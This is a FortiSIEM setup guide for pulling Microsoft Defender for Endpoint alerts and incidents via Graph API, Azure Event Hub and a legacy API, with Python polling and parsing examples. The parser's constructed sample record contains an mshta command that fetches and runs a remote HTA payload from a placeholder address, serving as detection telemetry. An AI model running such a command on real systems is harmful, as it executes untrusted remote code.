Microsoft Defender for Endpoint (Previously Microsoft Windows Defender Advanced Threat Protection (ATP))
There are two methods to ingest Microsoft Defender for Endpoint audit log data.
The existing method uses Azure Event Hub; see Configuration via Azure Event Hub below.
FortiSIEM also offers a new ingest method using the Microsoft Graph API, utilizing the Generic HTTPS Polling feature in FortiSIEM 6.6.0 and later.
This integration uses the Microsoft Graph APIs as of this writing. See Configuring Microsoft Graph Incident API using Generic HTTPS Poller and Configuring Microsoft Graph Alert API using Generic HTTPS Poller.
Configuring Microsoft Graph Incident API using Generic HTTPS Poller or Configuring Microsoft Graph Alert API using Generic HTTPS Poller
The Microsoft Graph security incidents and alerts_v2 APIs return data from all Microsoft 365 Defender services in the tenant, not only Defender for Endpoint:
- Microsoft Defender for Endpoint
- Microsoft Defender Vulnerability Management
- Microsoft Defender for Office 365
- Microsoft Defender for Identity
- Microsoft Defender for Cloud Apps
You may need to enable the API to work in your tenant.
Using the Generic HTTPS Poller feature, we have two pre-built integrations for the MS365 Defender API endpoints:
- https://graph.microsoft.com/v1.0/security/incidents
  Reference: https://learn.microsoft.com/en-us/graph/api/security-list-incidents?view=graph-rest-1.0&tabs=http
- https://graph.microsoft.com/v1.0/security/alerts_v2
  Reference: https://learn.microsoft.com/en-us/graph/api/security-list-alerts_v2?view=graph-rest-1.0&tabs=http
You will create two credentials using the "HTTPS Advanced" protocol, each representing the API call to each endpoint. There are two pre-defined definition files that you can import from this documentation. Use the following links for complete setup instructions.
Main Topics:
Configuration
The following Configuration Options are available:
- Configuring Microsoft Graph Incident API using Generic HTTPS Poller
- Configuring Microsoft Graph Alert API using Generic HTTPS Poller
Note: For general information on Generic HTTPS Poller, see Generic Log API Poller (HTTPS Advanced) Integration.
Configuring Microsoft Graph Incident API using Generic HTTPS Poller
To configure Microsoft Graph Incident API, you will need to perform setup in Azure and in FortiSIEM by taking the following steps.
Setup in Azure
Take the following steps to generate credentials for the API. This process is the same for the Incident API and Alert API; if it was completed for either API, it does not need to be repeated. In that case, go to Setup in FortiSIEM for the respective API (Incident, Alert).
- Sign in to the Azure Portal.
- Navigate to Azure Active Directory > App registrations.
- Click New registration.
- Select the new App, and select the Overview tab.
- Copy the Application (client) ID and the Directory (tenant) ID and save them. They are used in Setup in FortiSIEM.
- Click API permissions > Add a permission, select Microsoft Graph, and choose Application permissions. Add SecurityAlert.Read.All and SecurityIncident.Read.All (listed under Microsoft Threat Protection) so the App can call the alert and incident APIs. Application permissions, not Delegated, are required because the poller authenticates as the App with no signed-in user; these two read permissions are all it needs.
- Click API permissions > Grant admin consent for <your directory> (shown as Default Directory in a new tenant), and click Yes to grant admin consent for the requested permissions.
- Navigate to Certificates & secrets > Client secrets, and click New client secret to generate a new client secret. Choose the shortest expiry your rotation process supports; the poller stops working when the secret expires.
- Record the secret Value (not the Secret ID) for Setup in FortiSIEM. The value is displayed only once, immediately after creation.
Proceed with Setup FortiSIEM Credential to call the MS365 Defender Graph Incidents API Endpoint or Setup FortiSIEM to call the MS365 Defender Graph Alerts_v2 API Endpoint.
Setup FortiSIEM Credential to call the MS365 Defender Graph Incidents API Endpoint
To configure the Microsoft Incident API in FortiSIEM, take the following steps.
Create a New Device/Application
- Navigate to ADMIN > Device Support > Devices/Apps.
- Click New.
- From the Device/Application Type Definition dialog box, take the following steps.
  - From the Category drop-down list, select Device.
  - In the Vendor field, enter "WindowsDefenderIncident".
  - In the Model field, enter "Windows Defender".
  - In the Version field, enter the version number, for example, "1".
  - From the Device/App Group drop-down list, select Server.
  - From the Access Protocol drop-down list, remove SSH, SNMP, and TELNET.
  - From the Access Protocol drop-down list, select HTTPS Advanced.
  - Click Save.
Create the Credentials Configuration
- Navigate to ADMIN > Setup > Credentials.
- Under Step 1: Enter Credentials, click New.
- In the Name field, enter a name, for example "Windows Defender Incident".
- From the Device Type drop-down list, select the device type you just created in Create a New Device/Application.
- From the Authentication drop-down list, select Oauth2.0.
- Download the following file: MicrosoftWindowsDefenderIncidentAPI_http_advanced_definition.json.
- Click Import Definition.
- Select the file you just downloaded, and click Import.
- Click Yes to overwrite.
- Click the General Parameters icon and confirm the imported values:
  - Host Name: "https://graph.microsoft.com".
  - URI Stem: "/v1.0/security/incidents".
  - HTTP Method: GET.
  - Disable SSL Certificate Check: unchecked. Leave it unchecked; with the check disabled, anyone who can redirect the collector's traffic could present their own certificate and receive the bearer token sent in the Authorization header.
  - JSON Response Log Key: "value".
  - Log Header: "Microsoft 365 Defender Incident".
  - Click OK.
- Click the Authentication Parameters icon, and with the General tab selected, take the following steps.
  - In the Access Token URL field, enter "https://login.microsoftonline.com/{Tenant ID}/oauth2/v2.0/token", where {Tenant ID} is the tenant ID you recorded from Setup in Azure.
  - In the Client Id field, enter the Client ID you recorded from Setup in Azure.
  - In the Client Secret field, enter the client secret you recorded from Setup in Azure.
  - Click OK.
- Click Save.
Create the Credentials Mapping
- Under Step 2: Enter IP Range to Credential Associations, click New.
- From the Device Credential Mapping Definition dialog box, take the following steps.
  - In the IP/Host Name field, enter "graph.microsoft.com".
  - From the Credentials drop-down list, select the credential you just created.
  - Click Save.
Test the Credential
- Ensure the credentials mapping you just created is selected. If not, select it.
- Under Step 2: Enter IP Range to Credential Associations, click the Test drop-down list, and select Test Connectivity without Ping.
If successful, the new job appears in the ADMIN > Setup > Pull Events table. Events can then be queried in ANALYTICS.
If you encounter an error, refer to Common Errors for additional information that may help you resolve the issue.
Configuring Microsoft Graph Alert API using Generic HTTPS Poller
To configure Microsoft Graph Alert API, you will need to perform setup in Azure and in FortiSIEM by taking the following steps. If you have already done the setup in Azure for the Incident API, you can skip Setup in Azure, and proceed immediately to Setup FortiSIEM to call the MS365 Defender Graph Alerts_v2 API Endpoint.
Setup FortiSIEM to call the MS365 Defender Graph Alerts_v2 API Endpoint
To configure the Microsoft Alert API in FortiSIEM, take the following steps.
Create a New Device/Application
- Navigate to ADMIN > Device Support > Devices/Apps.
- Click New.
- From the Device/Application Type Definition dialog box, take the following steps.
  - From the Category drop-down list, select Device.
  - In the Vendor field, enter "WindowsDefenderAlert".
  - In the Model field, enter "Windows Defender".
  - In the Version field, enter the version number, for example, "1".
  - From the Device/App Group drop-down list, select Server.
  - From the Access Protocol drop-down list, remove SSH, SNMP, and TELNET.
  - From the Access Protocol drop-down list, select HTTPS Advanced.
  - Click Save.
Create the Credentials Configuration
- Navigate to ADMIN > Setup > Credentials.
- Under Step 1: Enter Credentials, click New.
- In the Name field, enter a name, for example "Windows Defender Alert".
- From the Device Type drop-down list, select the device type you just created in Create a New Device/Application.
- From the Authentication drop-down list, select Oauth2.0.
- Download the following file: MicrosoftWindowsDefenderAlertAPI_http_advanced_definition.json.
- Click Import Definition.
- Select the file you just downloaded, and click Import.
- Click Yes to overwrite.
- Click the General Parameters icon and confirm the imported values:
  - Host Name: "https://graph.microsoft.com".
  - URI Stem: "/v1.0/security/alerts_v2".
  - HTTP Method: GET.
  - Disable SSL Certificate Check: unchecked. Leave it unchecked for the same reason as for the Incident credential: the bearer token travels in the Authorization header and is only as safe as the certificate check.
  - JSON Response Log Key: "value".
  - Log Header: "Microsoft 365 Defender Alert".
  - Click OK.
- Click the Authentication Parameters icon, and with the General tab selected, take the following steps.
  - In the Access Token URL field, enter "https://login.microsoftonline.com/{Tenant ID}/oauth2/v2.0/token", where {Tenant ID} is the tenant ID you recorded from Setup in Azure.
  - In the Client Id field, enter the Client ID you recorded from Setup in Azure.
  - In the Client Secret field, enter the client secret you recorded from Setup in Azure.
  - Click OK.
- Click Save.
Create the Credentials Mapping
- Under Step 2: Enter IP Range to Credential Associations, click New.
- From the Device Credential Mapping Definition dialog box, take the following steps.
  - In the IP/Host Name field, enter "graph.microsoft.com".
  - From the Credentials drop-down list, select the credential you just created.
  - Click Save.
Test the Credential
- Ensure the credentials mapping you just created is selected. If not, select it.
- Under Step 2: Enter IP Range to Credential Associations, click the Test drop-down list, and select Test Connectivity without Ping.
If successful, the new job appears in the ADMIN > Setup > Pull Events table. Events can then be queried in ANALYTICS.
If you encounter an error, refer to Common Errors for additional information that may help you resolve the issue.
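What the Incident and Alert credentials above actually do, as an added example in Python (this is not FortiSIEM's poller code and not Microsoft's SDK): the OAuth2 client-credentials request that the Access Token URL, Client Id and Client Secret feed, followed by paged GETs of Host Name plus URI Stem whose "value" array is the JSON Response Log Key. It serves both the incidents credential and the alerts_v2 credential, which differ only in the URI Stem. The tenant ID, client ID, secret and the Graph responses are constructed so the script runs offline; urllib_transport is included for running the same logic against a real tenant when a Test Connectivity failure needs to be reproduced outside FortiSIEM.

```python
"""Offline walk-through of what the FortiSIEM HTTPS Advanced poller does
against the two Graph security endpoints: an OAuth2 client-credentials
request to the Access Token URL, then GETs of Host Name + URI Stem whose
"value" array (the JSON Response Log Key) holds the incidents or alerts.

Added example, not FortiSIEM or Microsoft code. Network access goes through
a transport callable; the default stub answers with constructed responses so
the script runs offline, and urllib_transport swaps in for a real tenant.
"""
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterator, List, Optional, Tuple

GRAPH_HOST = "https://graph.microsoft.com"
# Hypothetical tenant and app values, standing in for the IDs recorded in Setup in Azure.
TENANT_ID = "00000000-0000-0000-0000-000000000000"
CLIENT_ID = "11111111-1111-1111-1111-111111111111"
CLIENT_SECRET = "example-client-secret"

# (method, url, body, headers) -> response bytes
Transport = Callable[[str, str, Optional[bytes], Dict[str, str]], bytes]


def token_request(tenant_id: str, client_id: str, client_secret: str) -> Tuple[str, bytes]:
    """Build the client-credentials POST for the Access Token URL. The scope is
    Graph's /.default, which resolves to the application permissions the admin
    consented to (SecurityAlert.Read.All, SecurityIncident.Read.All)."""
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default",
    }).encode()
    return url, body


def get_token(transport: Transport, tenant_id: str, client_id: str, client_secret: str) -> str:
    url, body = token_request(tenant_id, client_id, client_secret)
    resp = json.loads(transport("POST", url, body,
                                {"Content-Type": "application/x-www-form-urlencoded"}))
    if "access_token" not in resp:
        # A wrong or expired secret shows up here as an AADSTS error rather than
        # as an empty event list later on.
        raise RuntimeError(f"token request failed: {resp.get('error')}: {resp.get('error_description')}")
    return resp["access_token"]


def poll(transport: Transport, token: str, uri_stem: str, log_key: str = "value") -> Iterator[dict]:
    """GET Host Name + URI Stem with the bearer token and yield each element of
    the log-key array, following @odata.nextLink until the last page."""
    url = GRAPH_HOST + uri_stem
    while url:
        page = json.loads(transport("GET", url, None, {"Authorization": f"Bearer {token}"}))
        if "error" in page:
            raise RuntimeError(f"Graph call failed: {page['error']}")
        for item in page.get(log_key, []):
            yield item
        url = page.get("@odata.nextLink")


def urllib_transport(method: str, url: str, body: Optional[bytes], headers: Dict[str, str]) -> bytes:
    """Real HTTPS transport. Certificate verification stays on, which is what
    leaving 'Disable SSL Certificate Check' unchecked means in the credential."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


# Constructed responses: a first page with a continuation link, then the last page.
_PAGE1 = {"value": [{"id": "1", "severity": "high", "status": "active"},
                    {"id": "2", "severity": "low", "status": "resolved"}],
          "@odata.nextLink": GRAPH_HOST + "/v1.0/security/incidents?$skiptoken=abc"}
_PAGE2 = {"value": [{"id": "3", "severity": "medium", "status": "active"}]}


def stub_transport(method: str, url: str, body: Optional[bytes], headers: Dict[str, str]) -> bytes:
    if method == "POST" and url.endswith("/oauth2/v2.0/token"):
        params = urllib.parse.parse_qs((body or b"").decode())
        if params.get("client_secret") != [CLIENT_SECRET]:
            return json.dumps({"error": "invalid_client",
                               "error_description": "AADSTS7000215: Invalid client secret provided."}).encode()
        return json.dumps({"token_type": "Bearer", "access_token": "stub-token"}).encode()
    if headers.get("Authorization") != "Bearer stub-token":
        return json.dumps({"error": {"code": "InvalidAuthenticationToken"}}).encode()
    return json.dumps(_PAGE2 if "$skiptoken" in url else _PAGE1).encode()


def fetch(uri_stem: str = "/v1.0/security/incidents", transport: Transport = stub_transport) -> List[dict]:
    """One poll cycle: obtain a token, then drain the endpoint. Use
    "/v1.0/security/alerts_v2" for the alert credential."""
    token = get_token(transport, TENANT_ID, CLIENT_ID, CLIENT_SECRET)
    return list(poll(transport, token, uri_stem))


if __name__ == "__main__":
    for incident in fetch():
        print(incident["id"], incident["severity"], incident["status"])
```

Against a real tenant, call fetch(transport=urllib_transport) with your own tenant ID, client ID and secret substituted. An AADSTS error in the token step points at the Azure app registration (wrong or expired secret, wrong tenant ID), while a Graph error after a good token points at missing admin consent or a wrong URI Stem; a single Test Connectivity result in FortiSIEM lumps these two failure classes together.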
Configuration via Azure Event Hub
To configure Microsoft Defender for Endpoint event forwarding to Azure event hub, you will be taking the following general actions.
- Create an Event Hub Namespace and Event Hub if one does not already exist.
- Create a SAS Policy and generate the primary SAS key for authentication.
- Record the Event Hub Namespace, Event Hub Name, SAS Policy Name, Primary Key, and consumer group for FortiSIEM configuration/authentication.
- Configure FortiSIEM for Azure Event Hub integration and run a test pull.
- Configure Microsoft Defender for Endpoint raw data streaming to forward events to the Azure Event Hub created earlier.
- Confirm that raw events are parsed.
Take the steps here to configure Microsoft Defender for Endpoint.
Azure Event Hub Configuration
Create an Event Hub Namespace and Event Hub
Complete these steps in the Azure Portal:
Step 1: Create a Resource Group in Azure
Note: If you already have a Resource Group to use, skip this section
A resource group is a logical collection of Azure resources. All resources are deployed and managed in a resource group. To create a resource group:
- Login to the Azure portal: https://portal.azure.com/
- Click Resource groups in the left navigation pane.
- Click Add.
- For Subscription, select the name of the Azure subscription in which you want to create the resource group.
- Enter a unique name for the resource group. The system immediately checks whether the name is available in the currently selected Azure subscription.
- Select a Region for the resource group.
- Click Review + Create.
- Click Create on the Review + Create page.
Note: In the example used in Step 2, a Resource Group called fsm1 was created.
Step 2: Create an Event Hub Namespace
An Event Hub namespace provides a unique scoping container, referenced by its fully-qualified domain name, in which you create one or more event hubs. To create a namespace in your resource group using the portal, complete the following steps:
- In the Azure portal, click Create a resource at the top left of the screen.
- In the Search the Marketplace box, enter Event Hubs, select Event Hubs from the results (it is listed under the Analytics category), and click Create. Alternatively, select All services in the left menu and select the star (*) next to Event Hubs to pin it to the menu, then open it and click Create.
- On the Create namespace page, complete the following steps:
- Enter a name for the namespace. The system immediately checks to see if the name is available.
- Choose the pricing tier (Basic or Standard).
- Select the subscription in which you want to create the namespace.
- Select a location for the namespace.
- Click Create. You may have to wait a few minutes for the system to fully provision the resources.
- Refresh the Event Hubs page to see the event hub namespace. You can check the status of the event hub creation in the alerts.
- Select the namespace. You see the home page for your Event Hubs Namespace in the portal.
Step 3: Create an Event Hub
To create an event hub within the namespace, follow these steps:
- In the Event Hubs Namespace page, click Event Hubs in the left menu.
- At the top of the window, click + Event Hub.
- Enter a name for your event hub, then click Create.
- You can check the status of the event hub creation in alerts. After the event hub is created, you see it in the list of event hubs.
Step 4: Configure an Event Hub Namespace
- Select the event hub namespace, go to Shared access policies, and click +Add. Enter the Policy name, select the right to grant, and click Create. The original procedure checks Manage; FortiSIEM only receives from the hub, so a policy with only Listen is the least-privilege choice for the collector. Test the pull with Listen before granting anything more.
- Select the Shared Access policy just created.
- The Azure Python SDK needs the SAS Policy name (defined above) and the Primary key when creating the credential in FortiSIEM. Copy the primary key and policy name to a text editor for later use, and delete that file once the FortiSIEM credential is saved.
Note: When the event hub namespace is created, Azure also creates a default Shared Access Policy named RootManageSharedAccessKey. Do not use it for the collector; it carries Manage rights over the whole namespace.
- Select the event hub namespace and go to Event Hubs.
- Select an event hub and go to Consumer group. You can click +Consumer group or use the default group name $Default.
Note: If you selected the Basic tier (1 Consumer Group), there is no option to add another Consumer group.
Configuration in FortiSIEM
Complete these steps in the FortiSIEM UI:
- Go to the ADMIN > Setup > Credentials tab.
- In Step 1: Enter Credentials:
- Follow the instructions in "Setting Credentials" in the User's Guide to create a new credential.
- Enter these settings in the Access Method Definition dialog box and click Save:
Settings | Description |
---|---|
Name | Enter a name for the credential |
Device Type | Microsoft Azure Event Hub |
Access Protocol | AZURE PYTHON SDK |
Pull Interval | The interval at which FortiSIEM pulls events from Azure Event Hub. Default is 5 minutes. |
Event Hub Namespace | The name of the Azure event hub namespace |
Event Hub Name | The name of the Azure event hub |
SAS Policy Name | Shared Access (SAS) Policy Name |
Primary Key | The primary key of that SAS policy (the value copied in Step 4, not its name) |
Consumer Group | The name of the consumer group |
Description | Description of the device |
- In Step 2: Enter IP Range to Credential Associations, click New.
- Enter a host name, an IP, or an IP range in the IP/Host Name field. For this integration, enter "azure.com".
- Select the name of your Azure event hub credential from the Credentials drop-down list.
- Click Save.
- Click the Test drop-down list and select Test Connectivity to test the connection to Azure event hub.
- To see the jobs associated with Azure, select ADMIN > Setup > Pull Events.
- To see the received events select ANALYTICS, then enter "Azure" in the search box.
Note: Azure services must be configured to write to the Event Hub before there are any events to be collected.
Microsoft Defender for Endpoint Configuration
For the latest Microsoft Defender for Endpoint information, see https://docs.microsoft.com/en-us/microsoft-365/security/defender/streaming-api-event-hub?view=o365-worldwide.
Ensure the following steps have been taken before proceeding.
- An event hub has been created in your tenant.
- Your contributor permissions have been configured.
Note: If they have not, log in to your Azure tenant, navigate to Subscriptions > Your subscription > Resource Providers, register Microsoft.insights, and configure your contributor permissions.
After your event hub namespace has been created, take the following actions.
- Define the user who will be logging into Microsoft 365 Defender as Contributor.
- If you are connecting to an application, add the App Registration Service Principal as Reader and Azure Event Hubs Data Receiver (this can also be done at Resource Group or Subscription level) by navigating to Event Hubs namespace > Access control (IAM) > Add, and verify the assignment under Role assignments.
Enable raw data streaming by taking the following steps.
- Log in to Microsoft 365 Defender as a Global Administrator or Security Administrator.
- Go to the Data export settings page in the Microsoft Defender portal.
- Click Add data export settings.
- Choose a name for your new settings.
- Choose Forward events to Azure Event Hubs.
- Type your Event Hubs name and your Event Hubs resource ID. To get your Event Hubs resource ID, go to your Azure Event Hubs namespace page on Azure > Properties tab > copy the text under Resource ID.
- Choose the events you want to stream and click Save.
On the next pull interval, you should see ingested Defender for Endpoint data, for example this AlertInfo record:
{
  "category": "AdvancedHunting-AlertInfo",
  "operationName": "Publish",
  "properties": {
    "AlertId": "da637801291442337370_2831234",
    "AttackTechniques": "[\"Ingress Tool Transfer (T1105)\",\"Deobfuscate/Decode Files or Information (T1140)\",\"Signed Script Proxy Execution (T1216)\",\"Signed Binary Proxy Execution (T1218)\",\"CMSTP (T1218.003)\",\"InstallUtil (T1218.004)\",\"Mshta (T1218.005)\",\"Regsvr32 (T1218.010)\",\"Rundll32 (T1218.011)\",\"XSL Script Processing (T1220)\"]",
    "Category": "Execution",
    "DetectionSource": "EDR",
    "MachineGroup": null,
    "ServiceSource": "Microsoft Defender for Endpoint",
    "Severity": "Low",
    "Timestamp": "2022-02-10T22:29:51.4127262Z",
    "Title": "Use of living-off-the-land binary to run malicious code"
  },
  "tenantId": "cdf65b83-41f2-4c0e-97ee-11111111111",
  "time": "2022-02-10T22:32:24.5796030Z"
}
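What a parser has to do with these records once the event hub pull is working, as an added example in Python (not FortiSIEM's parser and not Microsoft code). The hub message is modelled on the Streaming API format, a JSON envelope with a "records" array where each record carries the Advanced Hunting columns under "properties"; the two records inside are constructed, the first after the AlertInfo sample above and the second a DeviceProcessEvents row with a made-up host name and command line. Two details trip up rule writers: AttackTechniques is a JSON-encoded string inside the JSON and needs a second decode before the ATT&CK IDs can be matched, and the timestamps carry seven fractional digits and a trailing Z.

```python
"""Parse Defender for Endpoint records as they come off the Event Hub.
Added example, not FortiSIEM or Microsoft code. The hub message is modelled
on the Streaming API format: a JSON envelope with a "records" array, each
record carrying the Advanced Hunting columns under "properties". The records
below are constructed. AttackTechniques is a JSON-encoded string inside the
JSON, so it needs a second decode, and timestamps use seven fractional digits
with a trailing Z.
"""
import json
import re
from datetime import datetime, timezone
from typing import List, Optional

# ATT&CK IDs appear in parentheses after the technique name, e.g. "Mshta (T1218.005)".
TECHNIQUE_RE = re.compile(r"\((T\d{4}(?:\.\d{3})?)\)")

# Constructed hub message: one AlertInfo record and one DeviceProcessEvents record.
SAMPLE_MESSAGE = json.dumps({"records": [
    {"category": "AdvancedHunting-AlertInfo", "operationName": "Publish",
     "properties": {
         "AlertId": "da637801291442337370_2831234",
         "AttackTechniques": json.dumps(["Ingress Tool Transfer (T1105)", "Mshta (T1218.005)",
                                         "Rundll32 (T1218.011)"]),
         "Category": "Execution", "DetectionSource": "EDR", "MachineGroup": None,
         "ServiceSource": "Microsoft Defender for Endpoint", "Severity": "Low",
         "Timestamp": "2022-02-10T22:29:51.4127262Z",
         "Title": "Use of living-off-the-land binary to run malicious code"},
     "tenantId": "cdf65b83-41f2-4c0e-97ee-111111111111",
     "time": "2022-02-10T22:32:24.5796030Z"},
    {"category": "AdvancedHunting-DeviceProcessEvents", "operationName": "Publish",
     "properties": {
         "DeviceName": "ws01.example.test", "FileName": "mshta.exe",
         "ProcessCommandLine": "mshta.exe http://198.51.100.7/p.hta",
         "Timestamp": "2022-02-10T22:29:50.0000000Z"},
     "tenantId": "cdf65b83-41f2-4c0e-97ee-111111111111",
     "time": "2022-02-10T22:31:00.0000000Z"},
]}).encode()


def parse_ts(ts: str) -> datetime:
    """Defender writes 7 fractional digits and a trailing Z; trim to microseconds."""
    base, _, frac = ts.rstrip("Z").partition(".")
    dt = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S")
    return dt.replace(microsecond=int((frac + "000000")[:6]), tzinfo=timezone.utc)


def technique_ids(attack_techniques: Optional[str]) -> List[str]:
    """AttackTechniques is a string holding a JSON array; decode it, then pull the IDs."""
    if not attack_techniques:
        return []
    ids = []
    for entry in json.loads(attack_techniques):
        match = TECHNIQUE_RE.search(entry)
        if match:
            ids.append(match.group(1))
    return ids


def normalize(record: dict) -> dict:
    """Flatten one record into the fields a rule or dashboard would key on."""
    props = record["properties"]
    event_time = parse_ts(props["Timestamp"])
    received = parse_ts(record["time"])          # when Defender published it to the hub
    return {
        "table": record["category"].split("-", 1)[1],   # AdvancedHunting-AlertInfo -> AlertInfo
        "tenant": record["tenantId"],
        "event_time": event_time,
        "ingest_delay_s": (received - event_time).total_seconds(),
        "alert_id": props.get("AlertId"),
        "severity": props.get("Severity"),
        "title": props.get("Title"),
        "device": props.get("DeviceName"),
        "command_line": props.get("ProcessCommandLine"),
        "techniques": technique_ids(props.get("AttackTechniques")),
    }


def parse_message(payload: bytes) -> List[dict]:
    """Decode one hub message and normalize every Advanced Hunting record in it."""
    envelope = json.loads(payload)
    return [normalize(r) for r in envelope.get("records", [])
            if r.get("category", "").startswith("AdvancedHunting-")]


if __name__ == "__main__":
    for event in parse_message(SAMPLE_MESSAGE):
        print(event["table"], event["event_time"].isoformat(), event["severity"],
              event["device"], event["techniques"])
```

In a live consumer the same parse_message would be fed the body of each hub event (with the azure-eventhub package that is event.body_as_str() from an EventHubConsumerClient created with the SAS policy and the consumer group chosen above; that wiring is assumed here, not shown). The ingest_delay_s field is worth keeping: the gap between Timestamp and time is the streaming latency, and a rule that compares the two catches a stalled export before the pull job goes quiet.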
[Legacy] Microsoft Defender for Endpoint (Previously Microsoft Windows Defender Advanced Threat Protection (ATP) )
Note: This is a Legacy configuration.
As of November 2021, Microsoft has retired the Microsoft Defender ATP SIEM APIs. Defender ATP has also been relabeled as “Microsoft Defender for Endpoint”. All integrations using the SIEM APIs will cease to function after the Microsoft Defender for Endpoint SIEM API Deprecation date of April 1st, 2022.
Use Configuration via Azure Event Hub or the Microsoft Graph Generic HTTPS Poller configuration above instead.
LEGACY
- Integration Points
- Configuring Windows Defender for FortiSIEM REST API Access
- Configuring FortiSIEM for Windows Defender ATP REST API Access
Integration Points
Protocol | Information Discovered | Used For |
---|---|---|
Windows Defender ATP REST API | Alerts | Security and Compliance |
Configuring Windows Defender for FortiSIEM REST API Access
Legacy
Microsoft's documentation for the now-retired SIEM integration described this procedure; the steps from 'Enabling SIEM integration' are repeated here.
- Login to Windows Defender Center.
- Go to Settings > SIEM.
- Select Enable SIEM integration.
- Choose Generic API.
- Click Save Details to File.
- Click Generate Tokens.
Configuring FortiSIEM for Windows Defender ATP REST API Access
Legacy
Use the account in the previous step to enable FortiSIEM access. Complete these steps in the FortiSIEM UI by first logging in to the FortiSIEM Supervisor node.
- Define Windows Defender ATP REST API Access Credential in FortiSIEM
- Create IP Range to Credential Association and Test Connectivity
Define Windows Defender ATP REST API Access Credential in FortiSIEM
- Go to the ADMIN > Setup > Credentials tab.
- In Step 1: Enter Credentials:
- Follow the instructions in "Setting Credentials" in the User's Guide to create a new credential.
- Enter these settings in the Access Method Definition dialog box and click Save:

Settings | Description |
---|---|
Name | Enter a name for the credential |
Device Type | Microsoft Windows Defender ATP |
Access Protocol | Windows Defender ATP Alert REST API |
Tenant ID | Enter the Tenant ID for the credential created in Configuring Windows Defender for FortiSIEM REST API Access. |
Password config | For Manual, enter the Client ID and Client Secret for that credential. For CyberArk SDK, see CyberArk SDK Password Configuration. For CyberArk REST API, see CyberArk REST API Password Configuration. |
Organization | Choose an organization if it is an MSP deployment and the same credential is to be used for multiple customers. |
Description | Description of the device. |
Create IP Range to Credential Association and Test Connectivity
From the FortiSIEM Supervisor node, take the following steps.
- In Step 2: Enter IP Range to Credential Associations, click New.
- From the Credentials drop-down list, select the credential created in Define Windows Defender ATP REST API Access Credential in FortiSIEM.
- The IP/Host Name field is filled in automatically. To change the region, click the IP/Host Name field and select one of the following:
  EU: wdatp-alertexporter-eu.windows.com/api/alerts
  US: wdatp-alertexporter-us.windows.com/api/alerts
  UK: wdatp-alertexporter-uk.windows.com/api/alerts
  If Government Community Cloud (GCC), GCC High, or Department of Defense (DoD) is required, enter the appropriate host name in the IP/Host Name field:
  GCC: wdatp-alertexporter-us.gcc.securitycenter.windows.us
  GCC High and DoD: wdatp-alertexporter-us.securitycenter.windows.us
- Click Save.
- Select the entry just created and click the Test drop-down list and select Test Connectivity without Ping. A pop up will appear and show the Test Connectivity results.
- An entry will be created in ADMIN > Setup > Pull Events corresponding to this event pulling job. FortiSIEM will start to pull events from Windows Defender Center using the REST API.
Viewing Events
To view events received via Windows Defender ATP REST API, take the following steps:
- Go to ADMIN > Setup > Pull Events.
- Select the Windows Defender ATP entry and click Report.
The system will take you to the ANALYTICS tab and run a query to display the events received from Windows Defender Center in the last 15 minutes. You can modify the time interval to get more events.